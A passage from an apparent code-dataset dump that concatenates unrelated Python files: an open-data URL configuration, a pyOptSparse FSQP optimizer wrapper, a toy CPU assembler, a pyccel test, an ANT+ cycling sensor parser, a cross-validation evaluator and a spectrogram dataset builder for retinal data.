    '2017': '682daddd-82eb-4c9e-b105-4b06327dd5bb/download/BASREVENUCOM.csv',
    '2018': '682daddd-82eb-4c9e-b105-4b06327dd5bb/download/BASREVENUCOM.csv',
}

foyers_alloc_bas_revenus_url = {
    'commune': {
        year: foyers_alloc_bas_revenus_prefix + resource
        for year, resource in _resource_by_year.items()
    },
}

# Local file locations; raw files from 2016 onwards carry a '+' suffix.
foyers_alloc_bas_revenus_files = {
    'commune': {
        str(year): {
            'raw': os.path.join(
                caf_raw,
                'caf_foyers_bas_revenus-{}{}.csv'.format(year, '+' if year >= 2016 else '')),
            'processed': os.path.join(
                caf_processed,
                'caf_foyers_bas_revenus-{}.csv'.format(year)),
        }
        for year in range(2009, 2019)
    },
}
3313658 | # /bin/env python
"""
pyFSQP - A variation of the pyFSQP wrapper specificially designed to
work with sparse optimization problems.
"""
# =============================================================================
# FSQP Library
# =============================================================================
# ffsqp is a compiled Fortran extension that may be absent in some builds;
# record the failure as None here and raise a clear error only when FSQP()
# is actually instantiated.
try:
    from . import ffsqp
except ImportError:
    ffsqp = None
# =============================================================================
# Standard Python modules
# =============================================================================
import os
import time
# =============================================================================
# External Python modules
# =============================================================================
import numpy as np
# # ===========================================================================
# # Extension modules
# # ===========================================================================
from ..pyOpt_optimizer import Optimizer
from ..pyOpt_error import Error
# =============================================================================
# FSQP Optimizer Class
# =============================================================================
class FSQP(Optimizer):
    """
    FSQP Optimizer Class - Inherited from Optimizer Abstract Class
    """

    def __init__(self, *args, **kwargs):
        name = "FSQP"
        category = "Local Optimizer"
        defOpts = {
            "mode": [int, 100],  # FSQP Mode (See Manual)
            "iprint": [int, 2],  # Output Level (0 - None, 1 - Final, 2 - Major, 3 - Major Details)
            "miter": [int, 500],  # Maximum Number of Iterations
            "bigbnd": [float, 1e10],  # Plus Infinity Value
            "epstol": [float, 1e-8],  # Convergence Tolerance
            "epseqn": [float, 0],  # Equality Constraints Tolerance
            "iout": [int, 6],  # Output Unit Number
            "ifile": [str, "FSQP.out"],  # Output File Name
        }
        informs = {
            0: "Normal termination of execution",
            1: "User-provided initial guess is infeasible for linear constraints, unable to generate a point satisfying all these constraints",
            2: "User-provided initial guess is infeasible for nonlinear inequality constraints and linear constraints, unable to generate a point satisfying all these constraints",
            3: "The maximum number of iterations has been reached before a solution is obtained",
            4: "The line search fails to find a new iterate",
            5: "Failure of the QP solver in attempting to construct d0, a more robust QP solver may succeed",
            6: "Failure of the QP solver in attempting to construct d1, a more robust QP solver may succeed",
            7: "Input data are not consistent, check print out error messages",
            8: "Two consecutive iterates are numerically equivalent before a stopping criterion is satisfied",
            9: "One of the penalty parameters exceeded bigbnd, the algorithm is having trouble satisfying a nonlinear equality constraint",
        }
        if ffsqp is None:
            raise Error(
                "There was an error importing the compiled \
                ffsqp module"
            )
        Optimizer.__init__(self, name, category, defOpts, informs, *args, **kwargs)

        # We need jacobians in dense2d format
        self.jacType = "dense2d"

    def __call__(
        self, optProb, sens=None, sensStep=None, sensMode="FD", storeHistory=None, hotStart=None, storeSens=True
    ):
        """
        This is the main routine used to solve the optimization
        problem.

        Parameters
        ----------
        optProb : Optimization or Solution class instance
            This is the complete description of the optimization problem
            to be solved by the optimizer

        sens : str or python Function.
            Specify method to compute sensitivities. To explicitly
            use pyOptSparse gradient class to do the derivatives with
            finite differences use 'FD'. 'sens' may also be 'CS'
            which will cause pyOptSparse to compute the derivatives
            using the complex step method. Finally, 'sens' may be a
            python function handle which is expected to compute the
            sensitivities directly. For expensive function evaluations
            and/or problems with large numbers of design variables
            this is the preferred method.

        sensStep : float
            Set the step size to use for design variables. Defaults to
            1e-6 when sens is 'FD' and 1e-40j when sens is 'CS'.

        sensMode : str
            Use 'pgc' for parallel gradient computations. Only
            available with mpi4py and each objective evaluation is
            otherwise serial

        storeHistory : str
            File name of the history file into which the history of
            this optimization will be stored

        hotStart : str
            File name of the history file to "replay" for the
            optimization. The optimization problem used to generate
            the history file specified in 'hotStart' must be
            **IDENTICAL** to the currently supplied 'optProb'. By
            identical we mean, **EVERY SINGLE PARAMETER MUST BE
            IDENTICAL**. As soon as the requested evaluation point
            from SNOPT does not match the history, function and
            gradient evaluations revert back to normal evaluations.

        storeSens : bool
            Flag specifying if sensitivities are to be stored in hist.
            This is necessary for hot-starting only.
        """
        self.callCounter = 0
        self.storeSens = storeSens

        if len(optProb.constraints) == 0:
            self.unconstrained = True
            optProb.dummyConstraint = False

        self.optProb = optProb
        self.optProb.finalizeDesignVariables()
        self.optProb.finalizeConstraints()

        self._setInitialCacheValues()
        self._setSens(sens, sensStep, sensMode)
        blx, bux, xs = self._assembleContinuousVariables()
        ff = self._assembleObjective()

        # Determine all the constraint information, numbers etc.
        if self.optProb.nCon > 0:
            # We need to reorder this full jacobian...so get ordering:
            indices, blc, buc, fact = self.optProb.getOrdering(["ni", "li", "ne", "le"], oneSided=True)
            ncon = len(indices)
            self.optProb.jacIndices = indices
            self.optProb.fact = fact
            self.optProb.offset = buc

            # We need to call getOrdering a few more times to get
            # the remaining sizes:
            indices, __, __, __ = self.optProb.getOrdering(["ni"], oneSided=True)
            nineqn = len(indices)
            indices, __, __, __ = self.optProb.getOrdering(["ni", "li"], oneSided=True)
            nineq = len(indices)
            indices, __, __, __ = self.optProb.getOrdering(["ne"], oneSided=True)
            neqn = len(indices)
            indices, __, __, __ = self.optProb.getOrdering(["ne", "le"], oneSided=True)
            neq = len(indices)
        else:
            nineqn = 0
            nineq = 0
            neqn = 0
            neq = 0
            ncon = 0

        # We make a split here: If the rank is zero we setup the
        # problem and run SNOPT, otherwise we go to the waiting loop:
        if self.optProb.comm.rank == 0:
            # Set history/hotstart/coldstart
            self._setHistory(storeHistory, hotStart)

            # ======================================================================
            # FSQP - Objective Values Function
            # ======================================================================
            def obj(nparam, j, x, fj):
                if self._checkEval(x):
                    self._internalEval(x)

                fj = self.storedData["fobj"]
                return fj

            # ======================================================================
            # FSQP - Constraint Values Function
            # ======================================================================
            def cntr(nparam, j, x, gj):
                # for given j, assign to gj the value of the jth constraint evaluated at x
                if self._checkEval(x):
                    self._internalEval(x)

                gj = self.storedData["fcon"][j - 1]
                return gj

            # ======================================================================
            # FSQP - Objective Gradients Function
            # ======================================================================
            def gradobj(nparam, j, x, gradfj, obj):
                # assign to gradfj the gradient of the jth objective function evaluated at x
                if self._checkEval(x):
                    self._internalEval(x)

                gradfj[0:nparam] = self.storedData["gobj"]
                return gradfj

            # ======================================================================
            # FSQP - Constraint Gradients Function
            # ======================================================================
            def gradcntr(nparam, j, x, gradgj, obj):
                # assign to gradgj the gradient of the jth constraint evaluated at x
                if self._checkEval(x):
                    self._internalEval(x)

                gradgj[0:nparam] = self.storedData["gcon"][j - 1]
                return gradgj

            # Setup argument list values
            nparam = len(xs)
            nvar = nparam
            nf = 1
            mode = self.getOption("mode")
            if self.getOption("iprint") >= 0:
                iprint = self.getOption("iprint")
            else:
                raise Error("Incorrect iprint option. Must be >= 0")
            iout = self.getOption("iout")
            ifile = self.getOption("ifile")
            if iprint > 0:
                if os.path.isfile(ifile):
                    os.remove(ifile)

            gg = np.zeros(max(ncon, 1))
            miter = self.getOption("miter")
            inform = 0
            bigbnd = self.getOption("bigbnd")
            epstol = self.getOption("epstol")
            epsneq = self.getOption("epseqn")
            udelta = 0
            nobj = 1
            # Workspace sizes as required by the FSQP manual.
            iwsize = 6 * nvar + 8 * max([1, ncon]) + 7 * max([1, nobj]) + 30
            # Bug fix: np.float was deprecated and removed in NumPy 1.24;
            # the builtin float is the documented replacement.
            iw = np.zeros([iwsize], float)
            nwsize = (
                4 * nvar ** 2
                + 5 * max([1, ncon]) * nvar
                + 3 * max([1, nobj]) * nvar
                + 26 * (nvar + max([1, nobj]))
                + 45 * max([1, ncon])
                + 100
            )
            w = np.zeros([nwsize], float)

            # Run FSQP
            t0 = time.time()
            # fmt: off
            ffsqp.ffsqp(nparam, nf, nineqn, nineq, neqn, neq, mode, iprint, miter,
                        inform, bigbnd, epstol, epsneq, udelta, blx, bux, xs, ff,
                        gg, iw, iwsize, w, nwsize, obj, cntr, gradobj, gradcntr,
                        iout, ifile)
            # fmt: on
            optTime = time.time() - t0

            if iprint > 0:
                # NOTE(review): closeunit is passed the print level, not the
                # 'iout' unit number — verify against the ffsqp interface.
                ffsqp.closeunit(iprint)

            # Broadcast a -1 to indcate SLSQP has finished
            self.optProb.comm.bcast(-1, root=0)

            # Store Results
            sol_inform = {}
            # sol_inform['value'] = inform
            # sol_inform['text'] = self.informs[inform[0]]

            # Create the optimization solution
            sol = self._createSolution(optTime, sol_inform, ff, xs)

        else:  # We are not on the root process so go into waiting loop:
            self._waitLoop()
            sol = None

        # Communication solution and return
        sol = self._communicateSolution(sol)

        return sol

    def _on_setOption(self, name, value):
        """Hook called when an option is set; FSQP needs no special handling."""
        pass

    def _on_getOption(self, name):
        """Hook called when an option is read; FSQP needs no special handling."""
        pass
| StarcoderdataPython |
11264632 | <reponame>dwahme/simple_cpu
class Assembler:
    """Assembler for a toy 16-bit ISA: a 4-bit opcode in the top bits plus
    packed operand fields."""

    # mnemonic -> (opcode, expected token count incl. mnemonic, field bit offsets)
    ISA = {
        "ADD":    (0,  4, [4, 7, 10, 16]),
        "ADDR":   (1,  4, [4, 7, 10, 13]),
        "SUB":    (2,  4, [4, 7, 10, 16]),
        "SUBR":   (3,  4, [4, 7, 10, 13]),
        "MOV":    (4,  3, [4, 7, 16]),
        "MOVR":   (5,  3, [4, 7, 10]),
        "LOAD":   (6,  3, [4, 7, 16]),
        "LOADR":  (7,  3, [4, 7, 10]),
        "STORE":  (8,  3, [4, 7, 16]),
        "STORER": (9,  3, [4, 7, 10]),
        "JMP":    (10, 2, [4, 7]),
        "JEQ":    (11, 2, [4, 7]),
        "JNE":    (12, 2, [4, 7]),
        "JLT":    (13, 2, [4, 7]),
        "JGT":    (14, 2, [4, 7]),
        "EXIT":   (15, 1, [4]),
    }

    def __init__(self):
        pass

    # Converts an instruction to binary
    def encode(self, opcode, num_args, starts, args):
        """Pack one instruction into a 16-bit word.

        ``starts`` lists the cumulative bit offsets of each field and
        ``args`` is the mnemonic followed by its numeric operands.
        Returns -1 (after printing a message) on malformed input.
        """
        instr = opcode << 12  # opcode always occupies the top 4 bits

        if num_args != len(args):
            strs = [str(x) for x in args]
            print("Invalid number of arguments: " + " ".join(strs))
            return -1

        for idx, start in enumerate(starts[:-1]):
            # args[0] is the mnemonic, so operand idx maps to args[idx + 1];
            # each operand must fit in the bit width allotted to its field.
            if args[idx + 1] >= 2 ** (starts[idx + 1] - start):
                strs = [str(x) for x in args]
                print("Argument {} too large: ".format(args[idx + 1]) +
                      " ".join(strs))
                return -1
            instr += args[idx + 1] << 16 - starts[idx + 1]

        return instr

    # Converts a file to binary
    def assemble(self, file, outfile=""):
        """Assemble ``file``; optionally write hex words to ``outfile``.

        Returns the list of encoded 16-bit words, or [] on any encoding
        error. Blank lines, ``//`` comments and unknown mnemonics are
        skipped.
        """
        out = []

        with open(file, "r") as f:
            for line in f:
                splits = line.split()

                # Bug fix: skip blanks/comments *before* indexing splits[0]
                # or int()-converting operand tokens — the original parsed
                # first and crashed (IndexError/ValueError) on such lines.
                if not splits or splits[0][:2] == "//":
                    continue

                op = splits[0]
                spec = self.ISA.get(op)
                if spec is None:
                    # Unknown mnemonics are silently ignored, matching the
                    # original if/elif chain's fall-through behavior.
                    continue

                opcode, num_args, starts = spec
                nums = [int(x) for x in splits[1:]]
                out.append(self.encode(opcode, num_args, starts, [op] + nums))

                # Bug fix: guard against indexing an empty list.
                if out[-1] == -1:
                    return []

        if outfile != "":
            with open(outfile, "w") as f:
                f.writelines([str(format(x, '#06x'))[2:] + "\n" for x in out])

        return out
| StarcoderdataPython |
5167811 | <filename>tests/pyccel/scripts/import_syntax/collisions4.py
# pylint: disable=missing-function-docstring, missing-module-docstring/
# Pyccel test case: two user modules export a function with the same name;
# module-qualified access keeps the two calls unambiguous.
import user_mod
import user_mod2

# Exercise both same-named functions through their module namespaces.
test = user_mod.user_func(1.,2.,3.) + user_mod2.user_func(4.,5.)
print(test)
1703686 | <reponame>ayanezcasal/AntLibAYC<filename>libAnt/profiles/speed_cadence_profile.py
from libAnt.core import lazyproperty
from libAnt.profiles.profile import ProfileMessage
class SpeedAndCadenceProfileMessage(ProfileMessage):
    """ Message from Speed & Cadence sensor """

    def __init__(self, msg, previous):
        # Running totals and stale counters are carried forward from the
        # previous message so averages can be computed incrementally.
        super().__init__(msg, previous)
        self.staleSpeedCounter = previous.staleSpeedCounter if previous is not None else 0
        self.staleCadenceCounter = previous.staleCadenceCounter if previous is not None else 0
        self.totalRevolutions = previous.totalRevolutions + self.cadenceRevCountDiff if previous is not None else 0
        self.totalSpeedRevolutions = previous.totalSpeedRevolutions + self.speedRevCountDiff if previous is not None else 0

        if self.previous is not None:
            # An unchanged event time means no new sensor event arrived;
            # count consecutive repeats so speed/cadence can decay to 0
            # once max*Counter is exceeded.
            if self.speedEventTime == self.previous.speedEventTime:
                self.staleSpeedCounter += 1
            else:
                self.staleSpeedCounter = 0
            if self.cadenceEventTime == self.previous.cadenceEventTime:
                self.staleCadenceCounter += 1
            else:
                self.staleCadenceCounter = 0

    # 16-bit rollover limits for the event-time and revolution counters.
    maxCadenceEventTime = 65536
    maxSpeedEventTime = 65536
    maxSpeedRevCount = 65536
    maxCadenceRevCount = 65536
    # Number of repeated (stale) messages tolerated before reporting 0.
    maxstaleSpeedCounter = 7
    maxstaleCadenceCounter = 7

    def __str__(self):
        # NOTE(review): 2096 looks like a hard-coded wheel circumference in
        # mm — confirm against the sensor/wheel configuration.
        ret = '{} Speed: {:.2f}m/s (avg: {:.2f}m/s)\n'.format(super().__str__(), self.speed(2096),
                                                              self.averageSpeed(2096))
        ret += '{} Cadence: {:.2f}rpm (avg: {:.2f}rpm)\n'.format(super().__str__(), self.cadence, self.averageCadence)
        ret += '{} Total Distance: {:.2f}m\n'.format(super().__str__(), self.totalDistance(2096))
        ret += '{} Total Revolutions: {:d}'.format(super().__str__(), self.totalRevolutions)
        return ret

    @lazyproperty
    def cadenceEventTime(self):
        """ Represents the time of the last valid bike cadence event (1/1024 sec) """
        # Little-endian 16-bit value from payload bytes 0-1.
        return (self.msg.content[1] << 8) | self.msg.content[0]

    @lazyproperty
    def cumulativeCadenceRevolutionCount(self):
        """ Represents the total number of pedal revolutions """
        # Little-endian 16-bit value from payload bytes 2-3.
        return (self.msg.content[3] << 8) | self.msg.content[2]

    @lazyproperty
    def speedEventTime(self):
        """ Represents the time of the last valid bike speed event (1/1024 sec) """
        # Little-endian 16-bit value from payload bytes 4-5.
        return (self.msg.content[5] << 8) | self.msg.content[4]

    @lazyproperty
    def cumulativeSpeedRevolutionCount(self):
        """ Represents the total number of wheel revolutions """
        # Little-endian 16-bit value from payload bytes 6-7.
        return (self.msg.content[7] << 8) | self.msg.content[6]

    @lazyproperty
    def speedEventTimeDiff(self):
        """Elapsed speed-event time since the previous message, corrected
        for 16-bit counter rollover (units of 1/1024 sec)."""
        if self.previous is None:
            return 0
        elif self.speedEventTime < self.previous.speedEventTime:
            # Rollover
            return (self.speedEventTime - self.previous.speedEventTime) + self.maxSpeedEventTime
        else:
            return self.speedEventTime - self.previous.speedEventTime

    @lazyproperty
    def cadenceEventTimeDiff(self):
        """Elapsed cadence-event time since the previous message, corrected
        for 16-bit counter rollover (units of 1/1024 sec)."""
        if self.previous is None:
            return 0
        elif self.cadenceEventTime < self.previous.cadenceEventTime:
            # Rollover
            return (self.cadenceEventTime - self.previous.cadenceEventTime) + self.maxCadenceEventTime
        else:
            return self.cadenceEventTime - self.previous.cadenceEventTime

    @lazyproperty
    def speedRevCountDiff(self):
        """Wheel revolutions since the previous message, rollover-corrected."""
        if self.previous is None:
            return 0
        elif self.cumulativeSpeedRevolutionCount < self.previous.cumulativeSpeedRevolutionCount:
            # Rollover
            return (
                self.cumulativeSpeedRevolutionCount - self.previous.cumulativeSpeedRevolutionCount) + self.maxSpeedRevCount
        else:
            return self.cumulativeSpeedRevolutionCount - self.previous.cumulativeSpeedRevolutionCount

    @lazyproperty
    def cadenceRevCountDiff(self):
        """Pedal revolutions since the previous message, rollover-corrected."""
        if self.previous is None:
            return 0
        elif self.cumulativeCadenceRevolutionCount < self.previous.cumulativeCadenceRevolutionCount:
            # Rollover
            return (
                self.cumulativeCadenceRevolutionCount - self.previous.cumulativeCadenceRevolutionCount) + self.maxCadenceRevCount
        else:
            return self.cumulativeCadenceRevolutionCount - self.previous.cumulativeCadenceRevolutionCount

    def speed(self, c):
        """
        :param c: circumference of the wheel (mm)
        :return: The current speed (m/sec)
        """
        if self.previous is None:
            return 0
        if self.speedEventTime == self.previous.speedEventTime:
            # No new event: repeat the previous speed until too many stale
            # messages accumulate, then report standstill.
            if self.staleSpeedCounter > self.maxstaleSpeedCounter:
                return 0
            return self.previous.speed(c)
        return self.speedRevCountDiff * 1.024 * c / self.speedEventTimeDiff

    def distance(self, c):
        """
        :param c: circumference of the wheel (mm)
        :return: The distance since the last message (m)
        """
        return self.speedRevCountDiff * c / 1000

    def totalDistance(self, c):
        """
        :param c: circumference of the wheel (mm)
        :return: The total distance since the first message (m)
        """
        return self.totalSpeedRevolutions * c / 1000

    @lazyproperty
    def cadence(self):
        """
        :return: RPM
        """
        if self.previous is None:
            return 0
        if self.cadenceEventTime == self.previous.cadenceEventTime:
            # No new event: repeat the previous cadence until too many stale
            # messages accumulate, then report 0.
            if self.staleCadenceCounter > self.maxstaleCadenceCounter:
                return 0
            return self.previous.cadence
        return self.cadenceRevCountDiff * 1024 * 60 / self.cadenceEventTimeDiff

    @lazyproperty
    def averageCadence(self):
        """
        Returns the average cadence since the first message
        :return: RPM
        """
        if self.firstTimestamp == self.timestamp:
            return self.cadence
        return self.totalRevolutions * 60 / (self.timestamp - self.firstTimestamp)

    def averageSpeed(self, c):
        """
        Returns the average speed since the first message
        :param c: circumference of the wheel (mm)
        :return: m/s
        """
        if self.firstTimestamp == self.timestamp:
            return self.speed(c)
        return self.totalDistance(c) / (self.timestamp - self.firstTimestamp)
6661737 | # -*- coding: utf-8 -*-
"""
cherry.performance
~~~~~~~~~~~~
This module implements the cherry performance.
:copyright: (c) 2018-2019 by <NAME>
:license: MIT License, see LICENSE for more details.
"""
import numpy as np
from sklearn.model_selection import KFold
from sklearn.pipeline import Pipeline
from sklearn import metrics
from .base import load_data, write_file, get_vectorizer, get_clf
from .trainer import Trainer
from .classifyer import Classify
from .exceptions import MethodNotFoundError
class Performance:
    """Run k-fold cross-validation for a cherry model and report a
    classification report per fold.

    Expects keyword arguments: x_data, y_data, vectorizer,
    vectorizer_method, clf, clf_method, n_splits, output.
    """

    def __init__(self, model, **kwargs):
        x_data = kwargs['x_data']
        y_data = kwargs['y_data']
        if not (x_data and y_data):
            x_data, y_data = load_data(model)
        vectorizer = kwargs['vectorizer']
        vectorizer_method = kwargs['vectorizer_method']
        clf = kwargs['clf']
        clf_method = kwargs['clf_method']
        # Resolve defaults for the model before scoring, so score() always
        # receives concrete vectorizer/clf objects.
        if not vectorizer:
            vectorizer = get_vectorizer(model, vectorizer_method)
        if not clf:
            clf = get_clf(model, clf_method)
        n_splits = kwargs['n_splits']
        output = kwargs['output']
        for train_index, test_index in KFold(n_splits=n_splits, shuffle=True).split(x_data):
            x_train, x_test = x_data[train_index], x_data[test_index]
            y_train, y_test = y_data[train_index], y_data[test_index]
            print('Calculating score')
            self.score(vectorizer, clf, x_train, y_train, x_test, y_test, output)

    def score(self, vectorizer, clf, x_train, y_train, x_test, y_test, output):
        """Fit a vectorizer+classifier pipeline on the training fold and
        report metrics on the test fold, to stdout or to ``output``."""
        # Bug fix: the old fallback referenced undefined DEFAULT_VECTORIZER /
        # DEFAULT_CLF names (NameError on use); __init__ already resolves
        # both via get_vectorizer/get_clf, so the fallback is dropped.
        text_clf = Pipeline([
            ('vectorizer', vectorizer),
            ('clf', clf)])
        text_clf.fit(x_train, y_train)
        predicted = text_clf.predict(x_test)
        report = metrics.classification_report(y_test, predicted)
        if output == 'Stdout':
            print(report)
        else:
            # Bug fix: write_file is the module-level helper imported from
            # .base, not a method on this class (self.write_file raised
            # AttributeError).
            write_file(output, report)
| StarcoderdataPython |
3582905 | <reponame>cnzakimuena/avRNS<gh_stars>0
"""
spec_gen constructs a labelled dataset of spectrogram images from spatial series obtained using MATLAB for use as input
to machine learning classification algorithms.
"""
from os.path import join as p_join
import scipy
import scipy.io as sio
from scipy import signal
from scipy.fft import fftshift
# from scipy.io import wavfile
import numpy as np
import pandas as pd
import librosa
from librosa import display
import matplotlib.pyplot as plt
from PIL import Image
import cv2
from sklearn.model_selection import train_test_split
# Assign group variables
def get_variables(data_path, group_var, d_name, cc_name, l_name):
    """Load the two MATLAB data files for one group and return the named
    arrays (series 1, series 2, labels)."""
    path_1 = p_join(data_path, group_var, 'stateFull_Data.mat').replace("\\", "/")
    path_2 = p_join(data_path, group_var, 'stateFull_Data2.mat').replace("\\", "/")
    mat_1 = sio.loadmat(path_1)
    mat_2 = sio.loadmat(path_2)
    # The labels are identical in both files, so read them from the first.
    return mat_1[d_name], mat_2[cc_name], mat_1[l_name]
def spatial_series_plot(rec, sp_rate, t_var):
    """Plot one spatial series against distance.

    Parameters
    ----------
    rec : 1-D array
        Magnitudes sampled along distance.
    sp_rate : float
        Samples per millimetre.
    t_var : str
        Plot title.
    """
    length_of_space = len(rec) / sp_rate
    # Bug fix: the distance axis previously divided by the global
    # ``sampling_rate`` (undefined inside this function's scope) instead of
    # the ``sp_rate`` parameter.
    d = np.arange(0.0, rec.shape[0]) / sp_rate
    fig, ax = plt.subplots()
    ax.plot(d, rec, 'b-')
    ax.set(xlabel='Distance [$mm$]', ylabel='Magnitude', title=t_var)
    plt.xlim(0, length_of_space)
    return plt.show()
def spectrogram_plot(freq, space, s_im, rec, sp_rate):
    """Render a spectrogram as power/frequency (dB) over distance (mm)."""
    extent_mm = len(rec) / sp_rate
    plt.figure()
    mesh = plt.pcolormesh(space, freq, 10 * np.log10(s_im),
                          cmap='Greens', shading='gouraud')
    colorbar = plt.colorbar(mesh)
    colorbar.set_label('Power/Frequency [$dB/mm^{-1}$]')
    plt.ylabel('Frequency [$mm^{-1}$]')
    plt.xlabel('Distance [$mm$]')
    plt.xlim(0, extent_mm)
    return plt.show()
def find_spec_bounds(rec_full, sp_rate):
    """Scan every spatial series and return the global (max, min) of the
    log-power spectrogram values, used for dataset-wide normalization."""
    for row in range(rec_full.shape[0]):
        series = rec_full[row, :]
        _, _, sxx = signal.spectrogram(series, sp_rate, window='flattop',
                                       nperseg=40, noverlap=35)
        # Replace exact zeros with the smallest non-zero value so the
        # log10 below never sees zero.
        sxx[sxx == 0] = np.min(sxx[np.nonzero(sxx)])
        spec = 10 * np.log10(sxx)  # power spectral density in dB
        if row == 0:
            set_max = spec.max()
            set_min = spec.min()
        else:
            set_max = max(set_max, spec.max())
            set_min = min(set_min, spec.min())
    return set_max, set_min
def get_spec_im(rec, sp_rate, rec_max, rec_min):
    """Build a 64x64, 0-255, single-channel spectrogram image for one
    spatial series, normalized with the dataset-wide bounds rec_max/rec_min."""
    # f, s, sxx = signal.spectrogram(rec, sp_rate, window='flattop', nperseg=40, noverlap=35, mode='psd')
    f, s, sxx = signal.spectrogram(rec, sp_rate, window='flattop', nperseg=40, noverlap=35)
    # Setting array zeros to min non-zero values to avoid log10(0) error
    sxx[sxx == 0] = np.min(sxx[np.nonzero(sxx)])
    # # Uncomment to visualize spectrogram
    # spectrogram_plot(f, s, sxx, rec, sp_rate)
    spec = 10 * np.log10(sxx)  # power spectral density
    # Normalize spectrogram images to 0-255 range (based on inter- G1 and G2 maximum)
    spec = (spec - rec_min)/(rec_max-rec_min)  # signed integers normalization to 0-1 range
    # NOTE(review): this second step rescales by the *per-image* max, which
    # partly undoes the dataset-wide normalization above — confirm intended.
    spec *= 255.0/spec.max()  # normalization to 0-255 range
    # Resize images to 64x64
    res = cv2.resize(spec, dsize=(64, 64), interpolation=cv2.INTER_CUBIC)
    # print('Data Type: %s' % spec1.dtype)
    # print('Min: %.3f, Max: %.3f' % (spec1.min(), spec1.max()))
    # # Uncomment to visualize normalized drusen spectrogram image
    # plt.figure()
    # plt.imshow(res, cmap='Greens', vmin=0, vmax=255)
    # plt.show()
    res = res[..., np.newaxis]  # add channel axis for concatenation
    return res
def list_to_array(labels):
    """Flatten a MATLAB-style (n, 1) nested label cell array into an
    (n, 1) array of label strings."""
    # Each row is wrapped twice ([[label]]); peel both layers.
    flat = [row[0][0] for row in labels.tolist()]
    arr = np.asarray(flat)
    # Re-add the trailing dimension so the result can be concatenated.
    return arr.reshape(arr.shape[0], -1)
def get_x_array(rec_full_1, rec_full_2, sp_rate, set_max1, set_min1, set_max2, set_min2):
    """Build the (N, 64, 64, 2) uint8 image stack: channel 0 from the
    first series set, channel 1 from the second, each normalized with its
    own dataset-wide bounds."""
    n_samples = rec_full_1.shape[0]
    x_array = np.zeros((n_samples, 64, 64, 2))
    for sample in range(n_samples):
        chan_1 = get_spec_im(rec_full_1[sample, :], sp_rate, set_max1, set_min1)
        chan_2 = get_spec_im(rec_full_2[sample, :], sp_rate, set_max2, set_min2)
        # Stack the two single-channel images along the channel axis.
        x_array[sample, :, :, :] = np.concatenate((chan_1, chan_2), axis=2)
    return x_array.astype(np.uint8)
def get_y_array(labels_full):
    """Map an (n, 1) array of string labels to consecutive integer class ids.

    Labels are assumed grouped (all rows of one class contiguous); a new id
    is assigned whenever the label differs from the previous row.

    Returns
    -------
    y_array : np.ndarray, shape (1, n), dtype uint8
        Class id for every sample.
    cl_array : np.ndarray
        The distinct class ids in order of first appearance.
    """
    y_array = np.zeros((1, labels_full.shape[0]))
    counter = 0
    lab_list = []
    for i in range(labels_full.shape[0]):
        if i == 0:
            # First row starts class id 0 (the unused ``label0`` local from
            # the original implementation has been removed).
            lab_list.append(counter)
        elif labels_full[i, :] != labels_full[i - 1, :]:
            counter = counter + 1
            lab_list.append(counter)
        y_array[:, i] = counter
    cl_array = np.asarray(lab_list)
    y_array = y_array.astype(np.uint8)
    return y_array, cl_array
def split_dataset(x_array, y_array):
    """Randomly hold out 20% of the samples; return train/test X arrays and
    the corresponding Y labels reshaped back into (1, n) rows."""
    label_row = y_array.tolist()[0]
    x_train, x_test, y_train, y_test = train_test_split(
        x_array, label_row, test_size=0.20)
    y_train_row = np.asarray(y_train)[np.newaxis, ...]
    y_test_row = np.asarray(y_test)[np.newaxis, ...]
    return x_train, y_train_row, x_test, y_test_row
def load_split_spec_dataset(subjects_g1, subjects_g2, str_data_path, spl_rate):
    """Load the spectrogram dataset and split it into train/test sets.

    This is exactly load_spec_dataset followed by split_dataset; the body
    previously duplicated load_spec_dataset line-for-line, so it now
    delegates to avoid the two copies drifting apart.

    Args:
        subjects_g1: group-1 (AMD) subject selector.
        subjects_g2: group-2 (normal) subject selector.
        str_data_path: root path of the MATLAB data files.
        spl_rate: spatial sampling rate [px/mm].

    Returns:
        x_train_orig, y_train_orig, x_test_orig, y_test_orig, cl_array.
    """
    # Steps 1-3 (load series, build spectrogram images, numeric labels).
    x_array, y_array, cl_array = load_spec_dataset(
        subjects_g1, subjects_g2, str_data_path, spl_rate)
    # Step 4: 80/20 train/test split for the ResNet_model input.
    x_train_orig, y_train_orig, x_test_orig, y_test_orig = split_dataset(
        x_array, y_array)
    return x_train_orig, y_train_orig, x_test_orig, y_test_orig, cl_array
def load_spec_dataset(subjects_g1, subjects_g2, str_data_path, spl_rate):
    """Load the full (unsplit) spectrogram dataset for two subject groups.

    Returns:
        x_array: (N, 64, 64, 2) uint8 stack of drusen+cc spectrogram images.
        y_array: (1, N) uint8 array of numeric class codes.
        cl_array: 1-D array of the distinct class codes.
    """
    # 1) Extract out spatial series for drusen (recFull_GX_1) and cc (recFull_GX_2) from reading MATLAB file
    # 1.1) Assign AMD (group 1, G1) variables
    rec_full_g1_1, rec_full_g1_2, labels_g1 = get_variables(str_data_path, subjects_g1, 'recFull_Array',
                                                            'recFull_Array2', 'stateFull_Labels')
    # 1.2) Assign normal (group 2, G2) variables
    rec_full_g2_1, rec_full_g2_2, labels_g2 = get_variables(str_data_path, subjects_g2, 'recFull_Array',
                                                            'recFull_Array2', 'stateFull_Labels')
    # 2) Loops to generate ResNet_model X images input (number of images, row dim, col dim, channels depth)
    # 2.1) Obtain drusen and cc spectrogram dataset boundaries for normalization
    # combine G1 and G2 drusen series arrays
    rec_full_1 = np.concatenate((rec_full_g1_1, rec_full_g2_1))
    # find drusen dataset normalization max and min values
    rec_max1, rec_min1 = find_spec_bounds(rec_full_1, spl_rate)
    # combine G1 and G2 cc series arrays
    rec_full_2 = np.concatenate((rec_full_g1_2, rec_full_g2_2))
    # find cc dataset normalization max and min values
    rec_max2, rec_min2 = find_spec_bounds(rec_full_2, spl_rate)
    # 2.2) Loop to generate dataset of concatenated 64x64 drusen and cc spectrogram images
    x_array = get_x_array(rec_full_1, rec_full_2, spl_rate, rec_max1, rec_min1, rec_max2, rec_min2)
    # 3) Loop to generate ResNet_model Y labels and classes inputs
    # 3.1) Turn label lists into arrays and concatenate (G1 first, then G2)
    lab_arr_g1 = list_to_array(labels_g1)
    lab_arr_g2 = list_to_array(labels_g2)
    lab_full = np.concatenate((lab_arr_g1, lab_arr_g2), axis=0)
    # 3.2) Turn labels array into numerical array and generate classes variable
    y_array, cl_array = get_y_array(lab_full)
    # # 4) Select dataset split to recreate ResNet_model input
    # x_train_orig, y_train_orig, x_test_orig, y_test_orig = split_dataset(x_array, y_array)
    return x_array, y_array, cl_array
def fft_plot(space_series, spl_rate):
    """Plot the single-sided FFT spectrum of a spatial series in dB.

    Args:
        space_series: 1-D spatial series.
